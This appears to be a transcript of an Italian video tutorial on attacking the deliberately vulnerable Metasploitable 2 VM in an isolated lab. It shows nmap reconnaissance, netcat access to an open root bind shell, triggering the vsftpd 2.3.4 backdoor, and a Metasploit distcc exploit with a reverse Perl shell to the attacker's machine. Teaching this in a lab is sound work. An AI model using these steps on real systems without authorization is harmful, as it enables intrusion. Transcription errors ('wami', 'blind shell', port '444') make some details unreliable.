Se state guardando questo video, molto probabilmente vi state appassionando al mondo dell'ethical hacking, della cyber security o semplicemente volete capire come diavolo fanno gli hacker a bucare i sistemi dei server. Ma quando si parte da zero, la frustrazione è dietro l'angolo. Ti dicono di andare su piattaforme complesse, provi a lanciare script a caso, non funziona niente e ti viene voglia di lanciare il PC dalla finestra. Oggi cambiamo le regole del gioco. In questo video vi presento Metasploitable, ovvero la palestra perfetta per ogni aspirante hacker. È una macchina virtuale creata appositamente per essere vulnerabile e piena zeppa di falle di sicurezza reali. Vedremo perché è il punto di partenza obbligatorio se volete imparare sul serio e non solo copiare comandi a memoria, come installarla in totale sicurezza sul vostro PC senza rischiare di fare danni e soprattutto faremo insieme un paio di attacchi pratici per capire perché è così vulnerabile e come un attaccante può prenderne il controllo in pochissimi secondi. Questa macchina è un concentrato di servizi reali, protocolli obsoleti e configurazioni errate che vi costringerà a ragionare come un attaccante vero. Pensateci un attimo, quando andate su piattaforme più moderne, spesso la sfida sta nel trovare il trick nascosto dal creatore della macchina. Ma nella vita reale, quando fate un penetration test su un'infrastruttura aziendale, non trovate gli indovinelli. Trovate la pigrizia degli amministratori di sistema. E Metasploit è fantastica proprio per questo, perché rispecchia la realtà di un network fatto male e troverete protocolli vecchi, software mai aggiornati con vulnerabilità pubbliche gigantesche e configurazioni errate che vi lasciano la porta aperta solo perché qualcuno si è dimenticato di cambiare una password di default. E quindi qui non dovete indovinare nulla, ma dovete fare penetration tester. Dovete mappare la superficie di attacco, capire cosa c'è dentro e scegliere la strada più logica per entrare. Ok? Quindi per prima cosa vi dovete scaricare o VMware o VirtualBox. Bene, io ho già il mio VMware Workstation con già le macchine virtuali presenti, ma vi faccio vedere esattamente da dove scaricare Metasploitable. Da Google cercate Metasploitable e vi uscirà Metasploitable 2. Bene, cliccate sopra e andate direttamente al redirect di SurgeForge, che è quello ufficiale. Bene, una volta atterrati qui non dovete fare altro che andare su download, si aprirà il .zip e lo andrete a mettere nella cartella preferita. Cliccate salva e il download si avvierà. È un download di circa 800 MB e una volta scaricato vi basterà scompattare la cartella e importare il file .vmdk come disco rigido direttamente quando create la vostra macchina virtuale. Come dicevamo prima, Metasploitable è una macchina deliberatamente piena di falle schifose. Se la lasciate impostata sulla vostra rete di casa in modalità bridge e magari avete il modem con qualche porta aperta verso l'esterno, chiunque su internet può entrare e usarla come un ponte per infettare tutta la vostra rete. E questa tecnica viene chiamata pivoting. E quindi una volta arrivati qui, prima di cliccare Power on this virtual machine, andate con tasto destro sulla macchina in setting e assicuratevi che il network adapter sia impostato su NAT o su NAT oppure host only. Non lasciatela mai in modalità bridge. Avviamo la macchina e una volta avviata vi troverete davanti a una classica CLI. Che cos'è CLI? Interfaccia a riga di comando. Questa è la CLI di Linux. Le credenziali di default, scritte anche comunque a schermo, sono la classica msfadmin e password msfadmin. Dopo aver effettuato il login, la prima cosa che andremo a fare, ragazzi, è fare un ifconfig. Facendo un ifconfig andiamo a vedere esattamente che indirizzo IP ha preso la macchina Metasploit e come possiamo vedere la macchina ha preso il 192.168.204.138. Ora lasciamo così come sta e ci spostiamo sulla macchina Kali. Ma adesso sorge un problema principale. Come facciamo a sapere qual è l'indirizzo IP della macchina Metasploitable per poterla attaccare da Kali? Ovviamente vi mostrerò due metodi. Il primo metodo l'abbiamo già visto, quindi accedere sulla macchina Metasploitable, fare un ifconfig e vedere esattamente l'indirizzo IP della macchina. Ma mettiamo il caso che in uno scenario reale voi non abbiate le credenziali di accesso della vittima. Siete dentro la rete e dovete mappare quello che c'è intorno. Come lo trovate l'IP? Da Kali Linux, per prima cosa, dobbiamo controllare il nostro indirizzo IP. E quindi ci spostiamo sul terminale e lanciamo un IPA. Con IPA sappiamo che il nostro indirizzo IP di Kali è
192.168.204.129. Tecnicamente, ora, a livello logico, sappiamo che la nostra infrastruttura, tutta l'infrastruttura, gira sotto la sottorete 192.168.204.0. A questo punto utilizzeremo uno strumento che si chiama NetDiscover, che serve proprio a scovare gli host attivi in una rete locale senza fare troppo rumore. Quindi dal nostro terminale lanciamo un sudo netdiscover -r 192.168.204.0 sulla barra 24. Diamo un invio, inseriamo la password e lui farà la sua scansione. Ora lui sta scansionando tutte le macchine online all'interno della mia rete. E come potete vedere, la macchina Metasploitable ha 192.168.204.138. E quindi sostanzialmente cosa ha fatto NetDiscover? Ha fatto il mapping della rete inviando richieste ARP e nel giro di qualche secondo abbiamo visto comparire una lista di indirizzi IP con i relativi MAC address. Uno di questi siamo noi e gli altri sono altre macchine, di cui c'è anche Metasploitable. Bene, da qui ragazzi ora non dovremo far altro che aprire Nmap. Bene, ma fermiamoci un secondo. Che cos'è Nmap? Nmap sta semplicemente per Network Mapper e in gergo tecnico è il radar dei penetration tester. Quindi immaginate di trovarvi davanti a un condominio al buio e di voler sapere quali appartamenti hanno le finestre aperte, chi ci abita dentro e che marca magari è la serratura. Bene, Nmap tecnicamente bussa virtualmente a tutte le porte che in informatica si chiamano porte di rete per vedere quali sono aperte, quali servizi ci stanno girando sopra e che versione di software stanno utilizzando. Prima di partire con il tutto, se non sapete usare Nmap, state praticamente hackerando alla cieca. Sapendo che l'indirizzo IP di Metasploitable è 204.138, andiamo con un nmap-sv-p- -192.168.204.138. Quindi ricapitolando, SV sta per Service Version Detection. Questo flag è molto fondamentale perché se lanciamo Nmap normalmente lui vi dice solamente che la porta ipoteticamente 21 è aperta. Ma a noi non basta sapere questo, vogliamo sapere cosa ci gira dentro la porta e quindi il flag -sv interroga la porta, analizza la risposta e ci dice esattamente la marca e la versione del software. Ed è qui quindi che grazie a questo flag se scopriremo che c'è quel server FTP vulnerabile. E poi -p- non è altro che all ports, quindi tutte le porte. Di default Nmap scansiona solamente 1000 porte, che sono le più comuni, ma i sistemi, ragazzi, ascoltate bene, hanno ben 65.500 porte. Mettendo quindi il trattino dopo la P, stiamo dicendo a Nmap non scansionare solamente le prime 1000 più comuni, ma scansionale dalla prima all'ultima. Ci metterà molto più tempo, ma siamo sicuri di non lasciarci dietro nessuna porta nascosta. E infine, come vedete, l'IP del target, che non è altro quello di Metasploitable. Diamo un invio, lui inizierà la sua ricognizione e dato che ci vorrà qualche secondo vi lascio un trick al volo che molti non conoscono. Se ovviamente non vedete nulla è perché Nmap sta scansionando, quindi voi che cosa fate? Cliccate alla barra spaziatrice e vi dice esattamente a che percentuale sta la scansione e come potete vedere sta al 96%, quindi non è che non sta lavorando ma in modalità invisibile. E nel frattempo ragazzi vi dico anche che in uno scenario reale, in un pen test reale su un'azienda, sparare il comando -p-, quindi tutte le porte, vi farebbe sgamare da qualsiasi sistema di sicurezza, e questi sono i cosiddetti IPS o IDS. Ma visto che siamo all'interno del nostro laboratorio isolato, possiamo fare tutto il casino che vogliamo. E come avete visto, Nmap ha finito la sua ricognizione e ci sta facendo vedere tutte le porte e le falle di sicurezza aperte all'interno di Metasploitable. Sulla porta 21 abbiamo la VSFTPD 2.3.4, quella della famosa backdoor col sorriso di cui si è parlato per anni. Questa backdoor è stata famosa perché ha distrutto una vita digitale. E sulla porta 22 c'è un OpenSSH 4.7 su Debian,
quindi roba veramente antica. Sulla porta 23 c'è addirittura Telnet aperto. Chiunque sta seguendo questo video si è approcciato al mondo dell'informatica o lavora nel mondo dell'informatica, dovete sapere che Telnet il traffico viaggia in chiaro e quindi questo significa password compromesse, perché viaggiano anche le password. Se scendiamo sulla porta 1524 c'è una cosa assurda. C'è scritto blind shell metasploitable root shell. Significa che c'è una shell di root già aperta ed è pronta, che aspetta solo che qualcuno si collega con un netcat senza nemmeno bisogno di lanciare un exploit. E ancora più giù troviamo la porta 6667 e 6697. Abbiamo quindi un Unreal LIRCD. È un server IRC famoso per avere un'altra backdoor pazzesca. Avendo questo output di Nmap, un penetration tester ha l'imbarazzo della scelta. Andiamo a prenderci i permessi di root sfruttando la falla più clamorosa e iconica di questa macchina. Quindi, per chi ha le basi, prima di andare su Metasploit dobbiamo assolutamente guardare la porta 1524. Nmap ci dice chiaramente 1524 TCP Open Blind Shell Metasploitable Root Shell. È una shell che si mette in ascolto su una porta della macchina vittima e aspetta che qualcuno si connetta. Ma la vera follia è che qui già è attiva di default, senza che noi abbiamo fatto nulla. Questo perché, ragazzi, ricordiamo, Metasploitable è una macchina volutamente e appositamente vulnerabile proprio per fare i test. Andiamo su un altro terminale e ci lanciamo un netcat sull'indirizzo IP 192.168.204.138 spazio 1524, che è la porta vulnerabile. Diamo un invio e, come vedete, non chiede password, non chiede username, non chiede nulla perché è già bucata. E quindi all'interno ci scriviamo wami, diamo un invio utente root id e mi risponde root. E qui siamo dentro la macchina con i massimi privilegi. Questo però vi fa capire cosa succede quando un amministratore di sistema lascia attivi servizi di telecontrollo o di debug dimenticandosi di proteggerli o di chiuderli. Bene, e ora passiamo all'attacco storico. Emuleremo, ragazzi, un attacco storico del lontano 2011, dove degli hacker hanno bucato i server ufficiali di questo software e hanno inserito una backdoor nel codice. Prima triggeriamo tutto a mano e poi facciamo fare il lavoro tutto in automatico a Metasploit. Noi non faremo altro che connetterci a quella porta 21. Con un netcat indirizzo IP di Metasploitable porta 21 diamo un invio, come avete visto ci risponde 220. Questa è la conferma che il servizio è attivo e che la versione è esattamente quella vulnerabile. Per attivare la backdoor nascosta all'interno del codice, se il server riceve un nome utente che finisce con una faccina sorridente, apre una shell segreta sulla porta 6200. Non faremo altro che inserire un user faccina sorridente. Diamo un invio e ci dice per favore specifica una password. E quindi noi che cosa facciamo? Ci scriviamo pass123. Diamo un invio e lui, ragazzi, come potete vedere non fa nulla. Non ci risponde proprio. Bene, sta mentendo. Perché? Noi ora che cosa facciamo? Apriamo un altro terminale, sappiamo che questa backdoor, questa famosa backdoor gira, o meglio ha girato sulla 6200, gli lanciamo un netcat sulla porta 6200, diamo un invio e non succede nulla. Perché? Perché chi ha creato questo scherzetto dietro a questo codice è stato davvero un genio. Perché noi ora che cosa facciamo? Ci andiamo a scrivere all'interno wami, diamo un invio e siamo utente root. Voi non avete visto nulla, non siamo neanche entrati sulla porta 21, non ci ha sputato fuori, siamo dentro la macchina. E quindi, come nella foto qui sotto, guardate più in basso, abbiamo la porta 3632 aperta con il servizio DistCC versione 1. Che cos'è DistCC? Fermiamoci un attimo. Sostanzialmente è un programma che serve ai programmatori per distribuire la compilazione del codice su più computer in rete, così ovviamente da essere più veloci. Il problema di questa versione specifica è che non ha nessun sistema di autenticazione.
Quindi chiunque si colleghi a quella porta può dire al server esegui questo codice per me e il server senza esitare eseguirà il comando. Andiamo a vedere come sfruttarlo con Metasploit. Apriamo quindi un altro terminale, ci scriviamo msf console e diamo un invio. Starterà il Metasploit Framework e all'interno della riga di comando ci scriviamo search distcc, diamo un invio e noi andremo a trovare l'unico exploit disponibile, che sarebbe questo. Bene, una volta dato il comando non fateci caso alla scritta no payload configured, perché ci sta dicendo che visto che non abbiamo scelto noi un payload specifico, lui ha impostato in automatico quello di default, ovvero una reverse bash, che è esattamente quella che volevamo usare noi. Con il comando set rhost 192.168.204.138 andremo ad impostare la macchina di Metasploitable. Diamo un invio e poi con il set lhost 204.129 andiamo ad impostare la macchina Kali e infatti il nostro indirizzo IP è 204.129 e infine lanciamo il comando exploit. In meno di qualche secondo e come potete vedere la macchina non si è creata, ragazzi, perché abbiamo fatto un errore, ma meglio, perché sbagliare è la cosa più importante per iniziare l'approccio sul mondo dell'hacking. Quindi ora che cosa andremo a fare? Che cosa è successo? Tecnicamente il payload in sé per sé ha funzionato e il server ha eseguito il comando, ma il payload di default, quindi il reverse bash, ha provato a usare un comando nel terminale della vittima che in quel momento non è supportata, oppure meglio ancora è stata bloccata. Quindi tecnicamente l'exploit è andato a buon fine, ma la connessione non è riuscita a tornare a Kali. E quindi come noi e come Gino, perché soprattutto Gino non si ferma davanti a questi errori, se la classica bash fallisce cambiamo semplicemente il vettore della reverse shell, dicendo a Metasploit di usarne una scritta in un altro linguaggio, ad esempio in Perl o usando netcat. E quindi con un semplice set payload cmd/unix/reverse_perl diamo un invio e poi exploit. Lui sta facendo un reverse TCP sulla macchina Kali con la porta 444, ci dice che ha aperto una sessione e quindi il server ha eseguito il codice senza nessuna lamentela e ci ha restituito immediatamente la shell. All'interno diamo un bel wami, diamo un invio e lui ci restituisce daemon. E quindi perché non siamo diventati root ma siamo diventati daemon? Bene, questa è una piccola chicca che forse in pochi vi diranno, ma su Linux i servizi e i programmi che girano in background, che vengono chiamati appunto demoni sostanzialmente, non dovrebbero mai essere eseguiti con i privilegi massimi di root, perché se un hacker riesce a bucare quel tipo di servizio, come abbiamo fatto noi adesso, automaticamente eredita i privilegi dell'utente che ha avviato quel programma. In questo caso, gli amministratori di Metasploitable hanno configurato il servizio distcc in modo un po' più tecnicamente intelligente rispetto al servizio FTP e lo hanno fatto avviare dall'utente di sistema chiamato daemon e non root. Di conseguenza, noi abbiamo sfruttato la falla di distcc, il sistema ci ha dato una shell, ma i nostri poteri tecnicamente ora sono limitati a quello che può fare l'utente daemon. Per un pentest, ora diventare utente root, quindi salire di livello, inizia la fase più divertente, si chiama la privilege escalation, quindi la scalata dei privilegi, per fare il salto e passare ad utente root, ma questo lo vedremo in un prossimo video. Quindi ragazzi, ricapitolando, oggi abbiamo smontato tecnicamente Metasploitable pezzo per pezzo e siamo passati dal capire come mappare la rete con Nmap a triggerare una backdoor famosa e storica con una semplice faccina sorridente, fino a prendere il controllo di un servizio remoto con utente daemon.
E come avete visto, questa macchina non è un giochino per principianti, è letteralmente la palestra definitiva per capire la logica e la metodologia di un attacco reale. E ora ragazzi, tocca a voi vedere la seconda parte dove vi mostro come fare un privilege escalation su questa macchina per prenderci l'utente root e dominare Metasploitable. Se il video vi è piaciuto lasciate un like, iscrivetevi al canale e fatemi sapere nei commenti se conoscevate questa macchina e se l'avete mai utilizzata. E come diciamo sempre, restate sicuri, restate curiosi, ma restate invisibili.